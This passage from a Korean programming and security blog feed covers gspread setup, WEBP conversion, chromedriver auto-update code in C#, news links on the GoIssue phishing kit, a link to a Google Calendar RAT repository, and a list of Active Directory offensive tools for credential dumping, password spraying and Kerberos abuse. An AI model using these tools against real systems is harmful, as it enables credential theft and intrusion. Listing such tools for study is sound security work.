srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbf0hF8%2FbtsKJxZPyIu%2F0QdrFdT7gHFMVLHv40vaPk%2Fimg.png" onerror="this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';" loading="lazy" width="692" height="238" data-origin-width="692" data-origin-height="238"/></span></figure> </p> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>왼쪽 메뉴의 사용자 인증 정보로 들어간다. ( <b>사용자 인증 정보 만들기 클릭</b> )</li> </ul> <p><figure class="imageblock alignCenter" data-ke-mobileStyle="widthOrigin" data-origin-width="260" data-origin-height="303"><span data-url="https://blog.kakaocdn.net/dn/wfFNg/btsKKEQ6m9c/YWVbVG3AQsT3l36pzqZf7k/img.png" data-phocus="https://blog.kakaocdn.net/dn/wfFNg/btsKKEQ6m9c/YWVbVG3AQsT3l36pzqZf7k/img.png"><img src="https://blog.kakaocdn.net/dn/wfFNg/btsKKEQ6m9c/YWVbVG3AQsT3l36pzqZf7k/img.png" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FwfFNg%2FbtsKKEQ6m9c%2FYWVbVG3AQsT3l36pzqZf7k%2Fimg.png" onerror="this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';" loading="lazy" width="260" height="303" data-origin-width="260" data-origin-height="303"/></span></figure> <figure class="imageblock alignCenter" data-ke-mobileStyle="widthOrigin" data-origin-width="577" data-origin-height="155"><span data-url="https://blog.kakaocdn.net/dn/orEDW/btsKISKbypC/E5qxFHnrUhXSc0IxXVKpO1/img.png" data-phocus="https://blog.kakaocdn.net/dn/orEDW/btsKISKbypC/E5qxFHnrUhXSc0IxXVKpO1/img.png"><img src="https://blog.kakaocdn.net/dn/orEDW/btsKISKbypC/E5qxFHnrUhXSc0IxXVKpO1/img.png" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2ForEDW%2FbtsKISKbypC%2FE5qxFHnrUhXSc0IxXVKpO1%2Fimg.png" onerror="this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';" loading="lazy" width="577" height="155" data-origin-width="577" data-origin-height="155"/></span></figure> </p> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>아래 그럼 처럼 셋팅한다.</li> </ul> <p><figure class="imageblock alignCenter" data-ke-mobileStyle="widthOrigin" data-origin-width="225" data-origin-height="604"><span data-url="https://blog.kakaocdn.net/dn/cOFGgv/btsKKnIO0Bv/i9mctH3kmrAfN3vRuXf7RK/img.png" data-phocus="https://blog.kakaocdn.net/dn/cOFGgv/btsKKnIO0Bv/i9mctH3kmrAfN3vRuXf7RK/img.png"><img src="https://blog.kakaocdn.net/dn/cOFGgv/btsKKnIO0Bv/i9mctH3kmrAfN3vRuXf7RK/img.png" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcOFGgv%2FbtsKKnIO0Bv%2Fi9mctH3kmrAfN3vRuXf7RK%2Fimg.png" onerror="this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';" loading="lazy" width="225" height="604" data-origin-width="225" data-origin-height="604"/></span></figure> <figure class="imageblock alignCenter" data-ke-mobileStyle="widthOrigin" data-origin-width="562" data-origin-height="480"><span data-url="https://blog.kakaocdn.net/dn/b4rhIt/btsKJFJ8dR1/ld9Uuwa5PcNFBKuY5U59vk/img.png" data-phocus="https://blog.kakaocdn.net/dn/b4rhIt/btsKJFJ8dR1/ld9Uuwa5PcNFBKuY5U59vk/img.png"><img src="https://blog.kakaocdn.net/dn/b4rhIt/btsKJFJ8dR1/ld9Uuwa5PcNFBKuY5U59vk/img.png" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb4rhIt%2FbtsKJFJ8dR1%2Fld9Uuwa5PcNFBKuY5U59vk%2Fimg.png" onerror="this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';" loading="lazy" width="562" height="480" data-origin-width="562" data-origin-height="480"/></span></figure> </p> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>그런 다음 Google Sheet API를 검색하여 설치한다.</li> </ul> <p><figure class="imageblock alignCenter" data-ke-mobileStyle="widthOrigin" data-origin-width="870" data-origin-height="334"><span data-url="https://blog.kakaocdn.net/dn/ADyP8/btsKJy5w1UI/lnNZ9rkgugOuPmzilzHG0K/img.png" data-phocus="https://blog.kakaocdn.net/dn/ADyP8/btsKJy5w1UI/lnNZ9rkgugOuPmzilzHG0K/img.png"><img src="https://blog.kakaocdn.net/dn/ADyP8/btsKJy5w1UI/lnNZ9rkgugOuPmzilzHG0K/img.png" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FADyP8%2FbtsKJy5w1UI%2FlnNZ9rkgugOuPmzilzHG0K%2Fimg.png" onerror="this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';" loading="lazy" width="870" height="334" data-origin-width="870" data-origin-height="334"/></span></figure> </p> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>아래 명령어를 통해 모듈을 설치합니다. <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>pip install gspread</li> <li>pip install oauth2client</li> </ul> </li> </ul> <h2 data-ke-size="size26"><a href="http://docs.google.com/spreadsheets">docs.google.com/spreadsheets</a> 설정</h2> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>문서 생성 후 상단 공유 버튼 클릭</li> </ul> <p><figure class="imageblock alignCenter" data-ke-mobileStyle="widthOrigin" data-origin-width="153" data-origin-height="52"><span data-url="https://blog.kakaocdn.net/dn/c8439u/btsKJykb38g/23fWRcaYOUoddrRs6orPEk/img.png" data-phocus="https://blog.kakaocdn.net/dn/c8439u/btsKJykb38g/23fWRcaYOUoddrRs6orPEk/img.png"><img src="https://blog.kakaocdn.net/dn/c8439u/btsKJykb38g/23fWRcaYOUoddrRs6orPEk/img.png" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc8439u%2FbtsKJykb38g%2F23fWRcaYOUoddrRs6orPEk%2Fimg.png" onerror="this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';" loading="lazy" width="153" height="52" data-origin-width="153" data-origin-height="52"/></span></figure> </p> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>링크가 있는 모든 사용자로 변경</li> </ul> <p><figure class="imageblock alignCenter" data-ke-mobileStyle="widthOrigin" data-origin-width="615" data-origin-height="226"><span data-url="https://blog.kakaocdn.net/dn/caT6dz/btsKKna0Y4v/YBXKCjuhGV1UyQKOzOaPIK/img.png" data-phocus="https://blog.kakaocdn.net/dn/caT6dz/btsKKna0Y4v/YBXKCjuhGV1UyQKOzOaPIK/img.png"><img src="https://blog.kakaocdn.net/dn/caT6dz/btsKKna0Y4v/YBXKCjuhGV1UyQKOzOaPIK/img.png" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcaT6dz%2FbtsKKna0Y4v%2FYBXKCjuhGV1UyQKOzOaPIK%2Fimg.png" onerror="this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';" loading="lazy" width="615" height="226" data-origin-width="615" data-origin-height="226"/></span></figure> </p> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>추가적으로 링크를 복사해 gspread로 구글 시트를 제어할 수 있습니다.</li> </ul> <p data-ke-size="size16">&nbsp;</p> 공부/Programming google gspread python xlsx 엑셀 오블완 티스토리챌린지 a2sembly https://a2sembly.tistory.com/67 https://a2sembly.tistory.com/67#entry67comment Fri, 15 Nov 2024 00:27:29 +0900 https://a2sembly.tistory.com/66 <p data-ke-size="size16"><a href="https://m.boannews.com/html/detail.html?mtype=2&amp;tab_type=D&amp;idx=134299" target="_blank" rel="noopener&nbsp;noreferrer">https://m.boannews.com/html/detail.html?mtype=2&amp;tab_type=D&amp;idx=134299</a></p> <figure id="og_1731508213698" contenteditable="false" data-ke-type="opengraph" data-ke-align="alignCenter" data-og-type="article" data-og-title="깃허브에서 활동하는 개발자들을 노리는 고급 피싱 도구, 고이슈" data-og-description="새로운 피싱 도구가 사이버 범죄자들 사이에서 유행하기 시작했다. 이 도구는 깃허브(GitHub)에서 활동하는 개발자들을 집중적으로 노리는 피싱 메일 키트로, 이름은 고이슈(GoIssue)다. 깃허브 프" data-og-host="m.boannews.com" data-og-source-url="https://m.boannews.com/html/detail.html?mtype=2&amp;tab_type=D&amp;idx=134299" data-og-url="http://m.boannews.com/html/detail.html?idx=134299" data-og-image="https://scrap.kakaocdn.net/dn/cJejBF/hyXzOzFnsF/BftmWX4W4kai54PjEnDyH0/img.jpg?width=750&amp;height=500&amp;face=0_0_750_500"><a href="https://m.boannews.com/html/detail.html?mtype=2&amp;tab_type=D&amp;idx=134299" target="_blank" rel="noopener" data-source-url="https://m.boannews.com/html/detail.html?mtype=2&amp;tab_type=D&amp;idx=134299"> <div class="og-image" style="background-image: url('https://scrap.kakaocdn.net/dn/cJejBF/hyXzOzFnsF/BftmWX4W4kai54PjEnDyH0/img.jpg?width=750&amp;height=500&amp;face=0_0_750_500');">&nbsp;</div> <div class="og-text"> <p class="og-title" data-ke-size="size16">깃허브에서 활동하는 개발자들을 노리는 고급 피싱 도구, 고이슈</p> <p class="og-desc" data-ke-size="size16">새로운 피싱 도구가 사이버 범죄자들 사이에서 유행하기 시작했다. 이 도구는 깃허브(GitHub)에서 활동하는 개발자들을 집중적으로 노리는 피싱 메일 키트로, 이름은 고이슈(GoIssue)다. 깃허브 프</p> <p class="og-host" data-ke-size="size16">m.boannews.com</p> </div> </a></figure> <p data-ke-size="size16"><a href="https://m.boannews.com/html/detail.html?tab_type=1&amp;idx=134288" target="_blank" rel="noopener&nbsp;noreferrer">https://m.boannews.com/html/detail.html?tab_type=1&amp;idx=134288</a></p> <figure id="og_1731508219183" contenteditable="false" data-ke-type="opengraph" data-ke-align="alignCenter" data-og-type="article" data-og-title="획기적인 위협이 될 새로운 피싱 도구 고이슈, 깃허브의 개발자들 노려" data-og-description="보안 외신 해커뉴스에 의하면 새로운 피싱 도구가 등장했다고 한다. 이름은 고이슈(GoIssue)로, 깃허브에서 활동하는 개발자들을 주로 노리는 도구로 분석됐다. 고이슈는 대량의 피싱 메일을 발송" data-og-host="m.boannews.com" data-og-source-url="https://m.boannews.com/html/detail.html?tab_type=1&amp;idx=134288" data-og-url="http://m.boannews.com/html/detail.html?idx=134288" data-og-image="https://scrap.kakaocdn.net/dn/5D0um/hyXzQjV1c5/MqwnPE4C1KBYcqAUmYbhRk/img.jpg?width=750&amp;height=500&amp;face=0_0_750_500"><a href="https://m.boannews.com/html/detail.html?tab_type=1&amp;idx=134288" target="_blank" rel="noopener" data-source-url="https://m.boannews.com/html/detail.html?tab_type=1&amp;idx=134288"> <div class="og-image" style="background-image: url('https://scrap.kakaocdn.net/dn/5D0um/hyXzQjV1c5/MqwnPE4C1KBYcqAUmYbhRk/img.jpg?width=750&amp;height=500&amp;face=0_0_750_500');">&nbsp;</div> <div class="og-text"> <p class="og-title" data-ke-size="size16">획기적인 위협이 될 새로운 피싱 도구 고이슈, 깃허브의 개발자들 노려</p> <p class="og-desc" data-ke-size="size16">보안 외신 해커뉴스에 의하면 새로운 피싱 도구가 등장했다고 한다. 이름은 고이슈(GoIssue)로, 깃허브에서 활동하는 개발자들을 주로 노리는 도구로 분석됐다. 고이슈는 대량의 피싱 메일을 발송</p> <p class="og-host" data-ke-size="size16">m.boannews.com</p> </div> </a></figure> <p data-ke-size="size16"><a href="https://www.infosecurity-magazine.com/news/phishing-goissue-targets-github/" target="_blank" rel="noopener&nbsp;noreferrer">https://www.infosecurity-magazine.com/news/phishing-goissue-targets-github/</a></p> <figure id="og_1731508223289" contenteditable="false" data-ke-type="opengraph" data-ke-align="alignCenter" data-og-type="article" data-og-title="Phishing Tool GoIssue Targets Developers on GitHub" data-og-description="New phishing tool GoIssue targets GitHub, enabling mass phishing, and has been linked to the GitLoker extortion campaign" data-og-host="www.infosecurity-magazine.com" data-og-source-url="https://www.infosecurity-magazine.com/news/phishing-goissue-targets-github/" data-og-url="https://www.infosecurity-magazine.com/news/phishing-goissue-targets-github/" data-og-image="https://scrap.kakaocdn.net/dn/bsiEJu/hyXzKYklFm/GZUasGtRnhUsSSwGJUkdGk/img.jpg?width=300&amp;height=300&amp;face=0_0_300_300"><a href="https://www.infosecurity-magazine.com/news/phishing-goissue-targets-github/" target="_blank" rel="noopener" data-source-url="https://www.infosecurity-magazine.com/news/phishing-goissue-targets-github/"> <div class="og-image" style="background-image: url('https://scrap.kakaocdn.net/dn/bsiEJu/hyXzKYklFm/GZUasGtRnhUsSSwGJUkdGk/img.jpg?width=300&amp;height=300&amp;face=0_0_300_300');">&nbsp;</div> <div class="og-text"> <p class="og-title" data-ke-size="size16">Phishing Tool GoIssue Targets Developers on GitHub</p> <p class="og-desc" data-ke-size="size16">New phishing tool GoIssue targets GitHub, enabling mass phishing, and has been linked to the GitLoker extortion campaign</p> <p class="og-host" data-ke-size="size16">www.infosecurity-magazine.com</p> </div> </a></figure> <p data-ke-size="size16"><a href="https://www.darkreading.com/cloud-security/goissue-cybercrime-tool-github-developers-en-masse" target="_blank" rel="noopener&nbsp;noreferrer">https://www.darkreading.com/cloud-security/goissue-cybercrime-tool-github-developers-en-masse</a></p> <p data-ke-size="size16">&nbsp;</p> <p data-ke-size="size16">&nbsp;</p> 스크랩 github go goissue malware 깃허브 악성코드 오블완 티스토리챌린지 피싱 a2sembly https://a2sembly.tistory.com/66 https://a2sembly.tistory.com/66#entry66comment Thu, 14 Nov 2024 00:02:36 +0900 https://a2sembly.tistory.com/65 <h2 data-ke-size="size26"> ️ WEBP란?</h2> <blockquote data-ke-style="style3">WEBP는 Google에서 개발한 이미지 파일 형식으로, 압축 효율이 높아 웹 페이지의 로딩 속도를 빠르게 해줍니다.&nbsp;</blockquote> <blockquote data-ke-style="style2"><b>&nbsp;BUT.... <span style="background-color: #fcfcfc; color: #666666; text-align: left;">일부 프로그램은 WEBP를 지원하지 않으므로, 다른 형식으로 변환이 필요할 수 있습니다.</span></b></blockquote> <p data-ke-size="size16">Python에서 이미지를 처리하기 위한 대표적인 라이브러리로는 Pillow와 OpenCV가 있습니다. 이 글에서는 설치와 사용이 간편한 Pillow를 활용한 변환 방법을 소개합니다.</p> <h2 data-ke-size="size26">1️⃣ Pillow 설치 및 설정 방법</h2> <p data-ke-size="size16">Pillow는 다음과 같은 명령어로 설치할 수 있습니다.</p> <pre id="code_1731429840067" class="python" data-ke-language="python" data-ke-type="codeblock"><code>pip install pillow</code></pre> <h3 data-ke-size="size23">1️⃣.1️⃣ JPG로 변환하기</h3> <p data-ke-size="size16">다음은 Python 코드로 WEBP 이미지를 JPG로 변환하는 방법입니다.</p> <pre id="code_1731429890601" class="python" data-ke-language="python" data-ke-type="codeblock"><code>from PIL import Image # WEBP 이미지를 불러와 JPG로 저장 input_image = "image.webp" output_image = "image.jpg" # 이미지 열기 with Image.open(input_image) as img: img.convert("RGB").save(output_image, "JPEG")</code></pre> <h3 data-ke-size="size23">1️⃣.2️⃣ PNG로 변환하는 방법</h3> <p data-ke-size="size16">WEBP 이미지를 PNG 형식으로 저장하려면, JPEG 대신 PNG를 지정하면 됩니다.</p> <pre id="code_1731429972733" class="python" data-ke-language="python" data-ke-type="codeblock"><code>output_image = "image.png" with Image.open(input_image) as img: img.save(output_image, "PNG")</code></pre> <h3 style="color: #000000; text-align: start;" data-ke-size="size23"><span style="color: #000000;">1️⃣.3️⃣ 여러 파일을 일괄 변환하는 방법</span></h3> <pre id="code_1731430000108" class="python" data-ke-language="python" data-ke-type="codeblock"><code>import os from PIL import Image input_folder = "input_images" output_folder = "output_images" for filename in os.listdir(input_folder): if filename.endswith(".webp"): input_image = os.path.join(input_folder, filename) output_image = os.path.join(output_folder, f"{os.path.splitext(filename)[0]}.jpg") with Image.open(input_image) as img: img.convert("RGB").save(output_image, "JPEG")</code></pre> <h3 style="color: #000000; text-align: start;" data-ke-size="size23"><span style="color: #000000;">1️⃣.4️⃣ 해상도 및 품질 조정</span></h3> <p data-ke-size="size16">save 함수에 quality 옵션을 통해 품질을 조절할 수 있으며, resize 함수로 해상도를 조절할 수 있습니다.</p> <pre id="code_1731430101813" class="python" data-ke-language="python" data-ke-type="codeblock"><code>img_resized = img.resize((800, 600)) img_resized.save(output_image, "JPEG", quality=85)</code></pre> 공부/Programming convert JPG PiL png python webp 오블완 이미지 변환 티스토리챌린지 a2sembly https://a2sembly.tistory.com/65 https://a2sembly.tistory.com/65#entry65comment Wed, 13 Nov 2024 01:50:14 +0900 https://a2sembly.tistory.com/63 <p data-ke-size="size16">점점 정상 클라우드 서비스를 C2로 사용하는 악성코드가 많이 등장하는 것 같다..&nbsp;</p> <p data-ke-size="size16">타임라인 분석 시 좀 더 상세하게 확인해야 할 필요가 늘고 있다.</p> <p><figure class="imageblock alignCenter" data-ke-mobileStyle="widthOrigin" data-origin-width="858" data-origin-height="641"><span data-url="https://blog.kakaocdn.net/dn/zMrSM/btsz9lu9mZ2/uHjn94m7KhMYtcaz47Lojk/img.png" data-phocus="https://blog.kakaocdn.net/dn/zMrSM/btsz9lu9mZ2/uHjn94m7KhMYtcaz47Lojk/img.png" data-alt="GCR - Google Calendar RAT Github"><img src="https://blog.kakaocdn.net/dn/zMrSM/btsz9lu9mZ2/uHjn94m7KhMYtcaz47Lojk/img.png" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FzMrSM%2Fbtsz9lu9mZ2%2FuHjn94m7KhMYtcaz47Lojk%2Fimg.png" onerror="this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';" loading="lazy" width="858" height="641" data-origin-width="858" data-origin-height="641"/></span><figcaption>GCR - Google Calendar RAT Github</figcaption> </figure> </p> <p data-ke-size="size16">&nbsp;</p> <p data-ke-size="size16">&nbsp;아래는 Github 주소</p> <blockquote data-ke-style="style3">https://github.com/MrSaighnal/GCR-Google-Calendar-RAT</blockquote> <p data-ke-size="size16">&nbsp;</p> 공부/ETC 악성코드 침해사고 클라우드 포렌식 해킹 a2sembly https://a2sembly.tistory.com/63 https://a2sembly.tistory.com/63#entry63comment Fri, 10 Nov 2023 18:58:59 +0900 https://a2sembly.tistory.com/62 <ol style="list-style-type: decimal;" data-ke-list-type="decimal"> <li><a href="https://offsec.tools/tool/spraykatz"><b>spraykatz</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Credentials gathering tool automating remote procdump and parse of lsass process.</li> </ul> </li> <li><a href="https://offsec.tools/tool/BloodHound"><b>BloodHound</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Six Degrees of Domain Admin.</li> </ul> </li> <li><a href="https://offsec.tools/tool/CrackMapExec"><b>CrackMapExec</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>A swiss army knife for pentesting networks.</li> </ul> </li> <li><a href="https://offsec.tools/tool/pywerview"><b>pywerview</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>A (partial) Python rewriting of PowerSploit's PowerView.</li> </ul> </li> <li><a href="https://offsec.tools/tool/Prenum"><b>Prenum</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>The perils of the pre-Windows 2000 compatible access group in a Windows domain.</li> </ul> </li> <li><a href="https://offsec.tools/tool/adPEAS"><b>adPEAS</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Powershell tool to automate Active Directory enumeration.</li> </ul> </li> <li><a href="https://offsec.tools/tool/CypherDog"><b>CypherDog</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>PowerShell Cmdlets to interact with BloodHound Data via Neo4j HTTP API.</li> </ul> </li> <li><a href="https://offsec.tools/tool/Invoke-ADEnum"><b>Invoke-ADEnum</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Automate Active Directory Enumeration using PowerView.</li> </ul> </li> <li><a href="https://offsec.tools/tool/LDAPNomNom"><b>LDAPNomNom</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Anonymously bruteforce Active Directory usernames by abusing LDAP Ping requests.</li> </ul> </li> <li><a href="https://offsec.tools/tool/lsassy"><b>lsassy</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Python tool to remotely extract credentials on a set of hosts.</li> </ul> </li> <li><a href="https://offsec.tools/tool/o365recon"><b>o365recon</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Retrieve information via O365 and AzureAD with valid credentials.</li> </ul> </li> <li><a href="https://offsec.tools/tool/LDAP%20Password%20Hunter"><b>LDAP Password Hunter</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Password Hunter in active directory.</li> </ul> </li> <li><a href="https://offsec.tools/tool/FindUncommonShares"><b>FindUncommonShares</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Quickly find uncommon shares in vast Windows domains.</li> </ul> </li> <li><a href="https://offsec.tools/tool/ADRecon"><b>ADRecon</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Gather information about the Active Directory and generates a report.</li> </ul> </li> <li><a href="https://offsec.tools/tool/AzureADLateralMovement"><b>AzureADLateralMovement</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Lateral movement graph for Azure Active Directory.</li> </ul> </li> <li><a href="https://offsec.tools/tool/Snaffler"><b>Snaffler</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>A tool to help at finding delicious candy needles in a bunch of horrible boring haystacks.</li> </ul> </li> <li><a href="https://offsec.tools/tool/RidRelay"><b>RidRelay</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Enumerate usernames on a domain where you have no creds by using SMB relay.</li> </ul> </li> <li><a href="https://offsec.tools/tool/jackdaw"><b>jackdaw</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Gather gather gather.</li> </ul> </li> <li><a href="https://offsec.tools/tool/WinPwn"><b>WinPwn</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Automation for internal Windows pentest / AD-Security.</li> </ul> </li> <li><a href="https://offsec.tools/tool/ADRT"><b>ADRT</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Active Directory Report Tool.</li> </ul> </li> <li><a href="https://offsec.tools/tool/SharpHose"><b>SharpHose</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Asynchronous password spraying tool for Windows environments.</li> </ul> </li> <li><a href="https://offsec.tools/tool/windapsearch"><b>windapsearch</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Enumerate users, groups and computers from a Windows domain through LDAP queries.</li> </ul> </li> <li><a href="https://offsec.tools/tool/Rubeus"><b>Rubeus</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Rubeus is a toolkit for Kerberos interaction and abuses.</li> </ul> </li> <li><a href="https://offsec.tools/tool/linWinPwn"><b>linWinPwn</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Automates a number of Active Directory enumeration and vulnerability.</li> </ul> </li> <li><a href="https://offsec.tools/tool/msldap"><b>msldap</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>LDAP library for auditing Microsoft Active Directory.</li> </ul> </li> <li><a href="https://offsec.tools/tool/ADAPE%20Script"><b>ADAPE Script</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Active Directory assessment and privilege escalation script.</li> </ul> </li> <li><a href="https://offsec.tools/tool/ADReaper"><b>ADReaper</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Enumerate an Active Directory environment with LDAP queries.</li> </ul> </li> <li><a href="https://offsec.tools/tool/ADenum"><b>ADenum</b></a> <ul style="list-style-type: disc;" data-ke-list-type="disc"> <li>Find misconfiguration through LDAP to exploit weaknesses with Kerberos.</li> </ul> </li> </ol> 공부/ETC a2sembly https://a2sembly.tistory.com/62 https://a2sembly.tistory.com/62#entry62comment Thu, 17 Aug 2023 18:01:01 +0900 https://a2sembly.tistory.com/61 <p data-ke-size="size16">1. Chrome Version 확인</p> <pre id="code_1692171369958" class="csharp" data-ke-language="csharp" data-ke-type="codeblock"><code>private static string GetChromeVersion() { // Note: Chrome must be installed in the default location string keyPath = @"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe"; string result = null; using (RegistryKey key = Registry.LocalMachine.OpenSubKey(keyPath)) { if (key == null) { MessageBox.Show("Chrome 브라우저가 설치되어 있지 않거나, 기본 경로 설치 경로가 아닙니다.\nChrome 브라우저를 재설치 해주세요.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); Application.ExitThread(); } object executablePath = null; if (key != null) { executablePath = key.GetValue(""); } if (executablePath == null) { MessageBox.Show("Chrome 브라우저가 설치되어 있지 않거나, 기본 경로 설치 경로가 아닙니다.\nChrome 브라우저를 재설치 해주세요.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); Application.ExitThread(); } else { FileVersionInfo versionInfo = FileVersionInfo.GetVersionInfo(executablePath.ToString()); result = versionInfo.FileVersion; } } return result; }</code></pre> <p data-ke-size="size16">2. Selenium Driver 버전 확인</p> <pre id="code_1692171394155" class="csharp" data-ke-language="csharp" data-ke-type="codeblock"><code>private static string GetSeleniumVersion() { string driverPath = Path.Combine(Setting.CurrentDirectory, "chromedriver.exe"); string result = null; ProcessStartInfo startInfo = new ProcessStartInfo { FileName = driverPath, Arguments = "--version", UseShellExecute = false, RedirectStandardOutput = true, CreateNoWindow = true }; Process process = new Process { StartInfo = startInfo }; process.Start(); while (!process.StandardOutput.EndOfStream) { result = process.StandardOutput.ReadLine(); } process.WaitForExit(); string pattern = @"(?&lt;=ChromeDriver )(.*?)(?= \()"; Match match = Regex.Match(result, pattern); if (match.Success) { result = match.Value; } return result; }</code></pre> <p data-ke-size="size16">3. 버전 비교 및 업데이트</p> <pre id="code_1692171412501" class="csharp" data-ke-language="csharp" data-ke-type="codeblock"><code>public static void Download_SeleniumDriver() { var client = new WebClient(); string zipFilePath = Path.Combine(Setting.CurrentDirectory, "chromedriver_win32.zip"); string exeFilePath = Path.Combine(Setting.CurrentDirectory, "chromedriver.exe"); string LICENSE_iFilePath = Path.Combine(Setting.CurrentDirectory, "LICENSE.chromedriver"); string majorVersion = null; string latest_chromedriver = null; string downloadUrl = null; string chromeVersion = GetChromeVersion(); if (chromeVersion == null) { Application.ExitThread(); } else { majorVersion = chromeVersion.Substring(0, chromeVersion.LastIndexOf('.')); latest_chromedriver = Web.Gethtml($"https://chromedriver.storage.googleapis.com/LATEST_RELEASE_{majorVersion}"); downloadUrl = $"https://chromedriver.storage.googleapis.com/{latest_chromedriver}/chromedriver_win32.zip"; if (!File.Exists(exeFilePath)) { try { client.DownloadFile(downloadUrl, zipFilePath); ZipFile.ExtractToDirectory(zipFilePath, Setting.CurrentDirectory); } catch { if (File.Exists(zipFilePath)) { File.Delete(zipFilePath); } if (File.Exists(LICENSE_iFilePath)) { File.Delete(LICENSE_iFilePath); } MessageBox.Show("Chromedriver를 정상 다운로드 할 수 없습니다.\n인터넷 연결 확인 후 재실행하거나 직접 다운로드가 필요합니다.\n프로그램 재실행 이후에도 지속적인 문제가 발생할 경우 개발자게에 문의주세요.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); } } } string seleniumVersion = GetSeleniumVersion(); if (seleniumVersion != latest_chromedriver) { try { client.DownloadFile(downloadUrl, zipFilePath); using (var archive = ZipFile.OpenRead(zipFilePath)) { foreach (var entry in archive.Entries) { string entryPath = Path.Combine(Setting.CurrentDirectory, entry.FullName); if (File.Exists(entryPath)) File.Delete(entryPath); entry.ExtractToFile(entryPath); } } } catch { if (File.Exists(zipFilePath)) { File.Delete(zipFilePath); } if (File.Exists(LICENSE_iFilePath)) { File.Delete(LICENSE_iFilePath); } MessageBox.Show("Chromedriver를 정상 다운로드 할 수 없습니다.\n인터넷 연결 확인 후 재실행하거나 직접 다운로드가 필요합니다.\n프로그램 재실행 이후에도 지속적인 문제가 발생할 경우 개발자게에 문의주세요.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); } } if (File.Exists(zipFilePath)) { File.Delete(zipFilePath); } if 